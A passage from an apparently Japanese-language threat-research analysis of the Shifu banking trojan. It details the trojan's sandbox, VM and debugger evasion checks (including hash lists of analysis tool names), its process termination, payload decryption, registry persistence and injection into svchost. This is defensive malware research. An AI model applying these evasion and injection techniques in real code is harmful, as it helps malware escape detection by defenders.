\u30b0\u30ed\u30fc\u30d0\u30eb\u306eatom\u8868\u306b\u304a\u3051\u308bShifu atom\" width=\"742\" height=\"438\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3.png 742w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3-300x177.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3-370x218.png 370w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><\/a><figcaption id=\"caption-attachment-23099\" class=\"wp-caption-text\">\u56f33 \u30b0\u30ed\u30fc\u30d0\u30eb\u306eatom\u8868\u306b\u304a\u3051\u308bShifu atom<\/figcaption><\/figure>\n<h4>\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570<\/h4>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f2\u3064\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30d1\u30e9\u30e1\u30fc\u30bf\u304c\u5b58\u5728\u3057\u307e\u3059\u304c\u3001\u305d\u306e\u3046\u3061\u306e1\u3064\u306e\u307f\u304c\u6a5f\u80fd\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306f\u5c06\u6765\u306e\u6a5f\u80fd\u3067\u4f7f\u7528\u3055\u308c\u308b\u30d1\u30e9\u30e1\u30fc\u30bf\u304b\u3001\u524a\u9664\u3057\u5fd8\u308c\u305f\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">\u2013crypt-test<\/p>\n<p style=\"font-weight: 400; padding-left: 80px;\">[It work\u2019s!(\u6a5f\u80fd\u3057\u307e\u3059)]\u3068\u3044\u3046\u30c6\u30ad\u30b9\u30c8\u306e\u30e1\u30c3\u30bb\u30fc\u30b8 \u30dc\u30c3\u30af\u30b9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">\u2013vm-test<\/p>\n<p style=\"font-weight: 400; padding-left: 80px;\">\u6a5f\u80fd\u306f\u3042\u308a\u307e\u305b\u3093\u3002<\/p>\n<h4>\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af<\/h4>\n<h5>Sandboxie \/ Avast\u56de\u907f<\/h5>\n<p style=\"font-weight: 400;\">Shifu\u306f\u3001\u81ea\u8eab\u306e\u30d7\u30ed\u30bb\u30b9\u7a7a\u9593\u306bsnxhk.dll (Avast)\u30e2\u30b8\u30e5\u30fc\u30eb\u307e\u305f\u306fsbiedll.dll (Sandboxie)\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u305f\u3081\u306b\u3001GetModuleHandleA()\u3092\u547c\u3073\u51fa\u3057\u3066\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u3001\u30cf\u30f3\u30c9\u30eb\u304c\u8fd4\u3055\u308c\u308b\u304b\u3069\u3046\u304b\u3092\u8abf\u3079\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u6b21\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af\u306f\u3044\u305a\u308c\u3082\u3001Shifu\u304c32\u30d3\u30c3\u30c8\u306eWindows\u30de\u30b7\u30f3(Wow64\u30d7\u30ed\u30bb\u30b9\u3067\u306f\u306a\u3044)\u3067\u5b9f\u884c\u3055\u308c\u308b\u5834\u5408\u306b\u306e\u307f\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002<\/p>\n<h5>\u30d7\u30ed\u30bb\u30b9\u540d\u306e\u691c\u51fa<\/h5>\n<p style=\"font-weight: 400;\">\u5b9f\u884c\u4e2d\u306e\u30d7\u30ed\u30bb\u30b9\u540d\u3092\u5217\u6319\u3057\u3066\u304b\u3089\u5c0f\u6587\u5b57\u306b\u5909\u63db\u3057\u3001\u3053\u308c\u3089\u306e\u540d\u524d\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u3092\u8a08\u7b97\u3057\u3066\u3001\u6b21\u306e\u30ea\u30b9\u30c8\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0x99DD4432 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x1F413C1F \u2013 vmwaretray.exe<\/li>\n<li style=\"font-weight: 400;\">0x6D3323D9 \u2013 vmusrvc.exe<\/li>\n<li style=\"font-weight: 400;\">0x3BFFF885 \u2013 vmsrvc.exe<\/li>\n<li style=\"font-weight: 400;\">0x64340DCE \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x63C54474 \u2013 vboxtray.exe<\/li>\n<li style=\"font-weight: 400;\">0x2B05B17D \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0xF725433E \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x77AE10F7 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0xCE7D304E \u2013 dumpcap.exe<\/li>\n<li style=\"font-weight: 400;\">0xAF2015F2 \u2013 ollydbg.exe<\/li>\n<li style=\"font-weight: 400;\">0x31FD677C \u2013 importrec.exe<\/li>\n<li style=\"font-weight: 400;\">0x6E9AD238 \u2013 petools.exe<\/li>\n<li style=\"font-weight: 400;\">0xE90ACC42 \u2013 idag.exe<\/li>\n<li style=\"font-weight: 400;\">0x4231F0AD \u2013 sysanalyzer.exe<\/li>\n<li style=\"font-weight: 400;\">0xD20981E0 \u2013 sniff_hit.exe<\/li>\n<li style=\"font-weight: 400;\">0xCCEA165E \u2013 scktool.exe<\/li>\n<li style=\"font-weight: 400;\">0xFCA978AC \u2013 proc_analyzer.exe<\/li>\n<li style=\"font-weight: 400;\">0x46FA37FB \u2013 hookexplorer.exe<\/li>\n<li style=\"font-weight: 400;\">0xEEBF618A \u2013 multi_pot.exe<\/li>\n<li style=\"font-weight: 400;\">0x06AAAE60 \u2013 idaq.exe<\/li>\n<li style=\"font-weight: 400;\">0x5BA9B1FE \u2013 procmon.exe<\/li>\n<li style=\"font-weight: 400;\">0x3CE2BEF3 \u2013 regmon.exe<\/li>\n<li style=\"font-weight: 400;\">0xA945E459 \u2013 procexp.exe<\/li>\n<li style=\"font-weight: 400;\">0x877A154B \u2013 peid.exe<\/li>\n<li style=\"font-weight: 400;\">0x33495995 \u2013 autoruns.exe<\/li>\n<li style=\"font-weight: 400;\">0x68684B33 \u2013 autorunsc.exe<\/li>\n<li style=\"font-weight: 400;\">0xB4364A7A \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x9305F80D \u2013 imul.exe<\/li>\n<li style=\"font-weight: 400;\">0xC4AAED42 \u2013 emul.exe<\/li>\n<li style=\"font-weight: 400;\">0x14078D5B \u2013 apispy.exe<\/li>\n<li style=\"font-weight: 400;\">0x7E3DF4F6 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0xD3B48D5B \u2013 hookanaapp.exe<\/li>\n<li style=\"font-weight: 400;\">0x332FD095 \u2013 fortitracer.exe<\/li>\n<li style=\"font-weight: 400;\">0x2D6A6921 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x2AAA273B \u2013 joeboxserver.exe<\/li>\n<li style=\"font-weight: 400;\">0x777BE06C \u2013 joeboxcontrol.exe<\/li>\n<li style=\"font-weight: 400;\">0x954B35E8 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x870E13A2 \u2013 ?<\/li>\n<\/ul>\n<h4>\u30d5\u30a1\u30a4\u30eb\u306e\u691c\u51fa<\/h4>\n<p style=\"font-weight: 400;\">\u6b21\u306e\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u30d5\u30a9\u30eb\u30c0\u304c\u30b7\u30b9\u30c6\u30e0\u306b\u5b58\u5728\u3059\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3001\u5b58\u5728\u3059\u308b\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">c:\\sample\\pos.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\analysis\\sandboxstarter.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\analysis<\/li>\n<li style=\"font-weight: 400;\">c:\\insidetm<\/li>\n<li style=\"font-weight: 400;\">c:\\windows\\system32\\drivers\\vmmouse.sys<\/li>\n<li style=\"font-weight: 400;\">c:\\windows\\system32\\drivers\\vmhgfs.sys<\/li>\n<li style=\"font-weight: 400;\">c:\\windows\\system32\\drivers\\vboxmouse.sys<\/li>\n<li style=\"font-weight: 400;\">c:\\iDEFENSE<\/li>\n<li style=\"font-weight: 400;\">c:\\popupkiller.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\tools\\execute.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\Perl<\/li>\n<li style=\"font-weight: 400;\">c:\\Python27<\/li>\n<\/ul>\n<h4>\u30c7\u30d0\u30c3\u30ac\u306e\u691c\u51fa<\/h4>\n<p style=\"font-weight: 400;\">IsDebuggerPresent()\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u3067\u3001\u30c7\u30d0\u30c3\u30b0\u4e2d\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u307e\u305f\u3001ProcessDebugPort\u304a\u3088\u3073ProcessDebugObjectHandle\u3092\u6301\u3064ZwQueryInformationSystem()\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u3067\u3001\u30c7\u30d0\u30c3\u30ac\u306e\u5b58\u5728\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u30c7\u30d0\u30c3\u30ac\u304c\u691c\u51fa\u3055\u308c\u305f\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h4>Wireshark\u306e\u691c\u51fa<\/h4>\n<p style=\"font-weight: 400;\">CreateFile()\u3092\u4f7f\u7528\u3057\u3066\\\\.\\NPF_NdisWanIp\u306e\u30aa\u30fc\u30d7\u30f3\u3092\u8a66\u307f\u3001\u30aa\u30fc\u30d7\u30f3\u306b\u6210\u529f\u3057\u305f\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u306b\u5165\u308a\u307e\u3059\u3002<\/p>\n<h4>\u81ea\u5df1\u30b5\u30cb\u30c6\u30a3 \u30c1\u30a7\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">\u81ea\u8eab\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u9577\u3055\u304c30\u6587\u5b57\u3092\u8d85\u3048\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3001\u8d85\u3048\u3066\u3044\u308b\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u307e\u305f\u3001\u81ea\u8eab\u306e\u30d7\u30ed\u30bb\u30b9\u540d\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u304c\u3001\u6b21\u306e\u3044\u305a\u308c\u304b\u306b\u4e00\u81f4\u3059\u308b\u304b\u3069\u3046\u304b\u3082\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li>0xE84126B8 \u2013 sample.exe<\/li>\n<li>0x0A84E285 \u2013 ?<\/li>\n<li>0x3C164BED \u2013 ?<\/li>\n<li>0xC19DADCE \u2013 ?<\/li>\n<li>0xA07ACEDD \u2013 ?<\/li>\n<li>0xD254F323 \u2013 ?<\/li>\n<li>0xF3C4E556 \u2013 ?<\/li>\n<li>0xF8782263 \u2013 ?<\/li>\n<li>0xCA96016D \u2013 ?<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u3055\u3089\u306b\u3001GFI\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u5185\u306b\u3042\u308b\u6b21\u306e\u3044\u305a\u308c\u304b\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u3001\u81ea\u8eab\u306e\u30d7\u30ed\u30bb\u30b9 \u30a2\u30c9\u30ec\u30b9\u7a7a\u9593\u306b\u5b58\u5728\u3059\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">api_log.dll<\/li>\n<li style=\"font-weight: 400;\">dir_watch.dll<\/li>\n<li style=\"font-weight: 400;\">pstorec.dll<\/li>\n<\/ul>\n<h4>\u672a\u77e5\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306f\u3001\u76ee\u7684\u304c\u4e0d\u660e\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002Process32NextW()\u306e\u30a2\u30c9\u30ec\u30b9\u304c\u53d6\u5f97\u3055\u308c\u3001\u305d\u306e\u6700\u521d\u306e5\u30d0\u30a4\u30c8\u304c\u30b7\u30fc\u30b1\u30f3\u30b90x33C0C20800\u3068\u6bd4\u8f03\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u9006\u30a2\u30bb\u30f3\u30d6\u30eb\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306f\u3001\u76ee\u7684\u304c\u4e0d\u660e\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002Process32NextW()\u306e\u30a2\u30c9\u30ec\u30b9\u304c\u53d6\u5f97\u3055\u308c\u3001\u305d\u306e\u6700\u521d\u306e5\u30d0\u30a4\u30c8\u304c\u30b7\u30fc\u30b1\u30f3\u30b90x33C0C20800\u3068\u6bd4\u8f03\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u9006\u30a2\u30bb\u30f3\u30d6\u30eb\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">33C0\u00a0\u00a0XOR EAX,EAX\r\nC2 0800   RETN 8\r\n<\/pre>\n<p style=\"font-weight: 400;\">\u3053\u306e\u30b3\u30fc\u30c9\u306f32\u30d3\u30c3\u30c8\u306eWindows XP\u306b\u5b58\u5728\u3057\u3001\u305d\u308c\u3088\u308a\u5f8c\u306eWindows\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u305d\u306e\u95a2\u6570\u306eUnicode\u30d0\u30fc\u30b8\u30e7\u30f3\u304c\u307e\u3060\u5b9f\u88c5\u3055\u308c\u3066\u3044\u306a\u3044\u53ef\u80fd\u6027\u304c\u3042\u308b\u305f\u3081\u3067\u3059\u3002\u3053\u306e\u30b3\u30fc\u30c9\u3000\u30b7\u30fc\u30b1\u30f3\u30b9\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001Shifu\u304c32\u30d3\u30c3\u30c8\u306eWindows XP\u3067\u5b9f\u884c\u3055\u308c\u305f\u3053\u3068\u3092\u610f\u5473\u3057\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<h4>Windows\u30c9\u30e1\u30a4\u30f3\u540d\u306e\u30c1\u30a7\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">API\u95a2\u6570NetServerGetInfo()\u304a\u3088\u3073NetWkstaGetInfo()\u3092\u4f7f\u7528\u3057\u3066\u3001\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306e\u30ef\u30fc\u30af\u30b0\u30eb\u30fc\u30d7\u540d\u304c\u201cWORKGROUP\u201d\u307e\u305f\u306f\u201cHOME\u201d\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3001\u305d\u3046\u3067\u306a\u3044\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u6b21\u306b\u3001\u201cANALYSERS\u201d\u3068\u3044\u3046\u540d\u524d\u3092\u63a2\u3057\u3001\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u7121\u9650\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h4>\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3068\u30e6\u30fc\u30b6\u30fc\u540d\u306e\u30c1\u30a7\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">GetComputerName()\u304a\u3088\u3073GetUserName()\u3092\u4f7f\u7528\u3057\u3066\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3068\u30e6\u30fc\u30b6\u30fc\u540d\u3092\u53d6\u5f97\u3057\u3001\u6b21\u306e\u6587\u5b57\u5217\u3092\u63a2\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">SANDBOX<\/li>\n<li style=\"font-weight: 400;\">FORTINET<\/li>\n<li style=\"font-weight: 400;\">VIRUS<\/li>\n<li style=\"font-weight: 400;\">MALWARE<\/li>\n<li style=\"font-weight: 400;\">MALNETVM<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u3044\u305a\u308c\u304b\u306e\u6587\u5b57\u5217\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001\u7121\u9650\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h4>\u30d7\u30ed\u30bb\u30b9\u7d42\u4e86\u6a5f\u80fd<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306e\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u5b9f\u884c\u4e2d\u306e\u3059\u3079\u3066\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u5217\u6319\u3057\u3066\u304b\u3089\u305d\u308c\u305e\u308c\u306e\u540d\u524d\u3092\u5c0f\u6587\u5b57\u306b\u5909\u63db\u3057\u3001\u305d\u308c\u3089\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u3092\u8a08\u7b97\u3057\u3066\u3001\u6b21\u306e\u3082\u306e\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0xD2EFC6C4 \u2013 python.exe<\/li>\n<li style=\"font-weight: 400;\">0xE185BD8C \u2013 pythonw.exe<\/li>\n<li style=\"font-weight: 400;\">0xDE1BACD2 \u2013 perl.exe<\/li>\n<li style=\"font-weight: 400;\">0xF2EAA55E \u2013 autoit3.exe<\/li>\n<li style=\"font-weight: 400;\">0xB8BED542 \u2013 ?<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u4e00\u81f4\u3059\u308b\u3082\u306e\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001OpenProcess()\u3068TerminateProcess()\u3092\u4f7f\u7528\u3057\u3066\u3001\u30d7\u30ed\u30bb\u30b9\u3092\u307e\u305a\u7d42\u4e86\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u7d42\u4e86\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u3001ZwClose()\u306eHANDLE_FLAG_PROTECT_FROM_CLOSE\u304c\u30d5\u30e9\u30b0\u4ed8\u3051\u3055\u308c\u3066\u3044\u308b\u3068\u304d\u306f\u3001\u305d\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u30e1\u30a4\u30f3 \u30a6\u30a3\u30f3\u30c9\u30a6 \u30cf\u30f3\u30c9\u30eb\u3092\u9589\u3058\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u5b8c\u5168\u306a\u30a2\u30af\u30bb\u30b9\u6a29\u9650\u3067\u30d7\u30ed\u30bb\u30b9\u3092\u958b\u304d\u3001ZwUnmapViewOfSection()\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u30e1\u30e2\u30ea\u304b\u3089\u30de\u30c3\u30d7\u89e3\u9664\u3057\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u30de\u30c3\u30d7\u89e3\u9664\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u306e\u30e1\u30a4\u30f3 \u30a6\u30a3\u30f3\u30c9\u30a6 \u30cf\u30f3\u30c9\u30eb\u3092\u9589\u3058\u307e\u3059\u3002<\/p>\n<h4>\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5fa9\u53f7\u5316\u3001\u89e3\u51cd\u304a\u3088\u3073\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5fa9\u53f7\u5316\u3059\u308b\u305f\u3081\u306b\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u5fa9\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3067\u5fc5\u8981\u3068\u3055\u308c\u308bsalt\u5024\u3092.rsrc\u30bb\u30af\u30b7\u30e7\u30f3\u304b\u3089\u53d6\u5f97\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u6539\u5909\u3055\u308c\u305fRC4\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3067\u306f\u3001salt\u5024\u3092\u4f7f\u7528\u3057\u3066\u3001\u5148\u982d\u30d0\u30a4\u30c8\u306b\u5f8c\u7d9a\u3059\u308b256\u30d0\u30a4\u30c8\u306e\u914d\u5217\u3068\u306eXOR\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u6697\u53f7\u5316\u3055\u308c\u305f\u914d\u5217\u3092\u4f7f\u7528\u3057\u3066\u3001.tls\u30bb\u30af\u30b7\u30e7\u30f3\u5185\u306e\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001aPLib\u5727\u7e2e\u30e9\u30a4\u30d6\u30e9\u30ea\u3068\u4e00\u7dd2\u306b\u5727\u7e2e\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u304c\u4e2d\u9ad8\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u306e\u30d7\u30ed\u30bb\u30b9\u3068\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u5834\u5408\u3001atom\u6587\u5b57\u5217\u540d\u3092\u8a08\u7b97\u3059\u308b\u30eb\u30fc\u30c1\u30f3\u304c\u518d\u5ea6\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002\u4eca\u56de\u306f\u3001\u201cae000000\u201d\u306a\u3069\u306e\u6587\u5b57\u5217\u3092\u69cb\u7bc9\u3059\u308b\u306e\u306b\u6700\u521d\u306e4\u30d0\u30a4\u30c8\u306e\u307f\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001\u3053\u306e\u6587\u5b57\u5217\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u304c\u8a08\u7b97\u3055\u308c\u30010x0\u304b\u30890xFF\u306e\u7bc4\u56f2\u5185\u306b\u3042\u308b\u3001256\u30d0\u30a4\u30c8\u306e\u5225\u306e\u914d\u5217\u3068\u306eXOR\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u914d\u5217\u304c\u3001\u5fa9\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u518d\u6697\u53f7\u5316\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u751f\u6210\u3055\u308c\u305f\u6697\u53f7\u5316\u30c7\u30fc\u30bf\u306f\u3001\u6301\u7d9a\u6027\u306e\u305f\u3081\u306b\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u305d\u306e\u969b\u306b\u306f\u3001\u201cHKCU\\software\\microsoft\\windows\u201d\u30ad\u30fc\u306e\u4e0b\u306e\u30e9\u30f3\u30c0\u30e0\u306aCRC32\u30cf\u30c3\u30b7\u30e5\u540d(\u4f8b: \u201cf4e64d63\u201d)\u3068\u3057\u3066\u8ffd\u52a0\u3055\u308c\u307e\u3059\u3002\u307e\u305f\u3001\u6587\u5b57\u5217\u201cae000000\u201d\u304c\u540d\u524d\u306e2\u756a\u76ee\u306e\u5024\u304c\u4f5c\u6210\u3055\u308c\u3001null\u30d0\u30a4\u30c8\u3068\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u3078\u306e\u30d1\u30b9(\u4f8b: \u201cC:\\ProgramData\\7d5d6044.exe\u201d)\u3067\u57cb\u3081\u8fbc\u307e\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u4e00\u6642\u7684\u306b\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u518d\u5ea6\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23096\" aria-describedby=\"caption-attachment-23096\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23096 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4.png\" alt=\"\u56f34Windows\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3068\u521d\u671f\u30ed\u30fc\u30c0\u30fc \u30d1\u30b9\" width=\"945\" height=\"464\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-900x442.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-300x147.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-768x377.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-370x182.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23096\" class=\"wp-caption-text\">\u56f34Windows\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3068\u521d\u671f\u30ed\u30fc\u30c0\u30fc \u30d1\u30b9<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30e1\u30e2\u30ea\u5185\u3067\u89e3\u51cd\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u4e2d\u65ad\u72b6\u614b\u306esvchost.exe\u30d7\u30ed\u30bb\u30b9(x86)\u304c\u3001\u89aa\u30d7\u30ed\u30bb\u30b9\u3068\u540c\u3058\u6574\u5408\u6027\u30ec\u30d9\u30eb\u3067\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30d7\u30ed\u30bb\u30b9\u306b\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u3001PE\u30de\u30b8\u30c3\u30af\u5024(MZ)\u304c\u30d1\u30c3\u30c1\u9069\u7528\u3055\u308c\u307e\u3059\u3002svchost\u30d7\u30ed\u30bb\u30b9\u304c\u518d\u958b\u3055\u308c\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u30d0\u30c3\u30c1 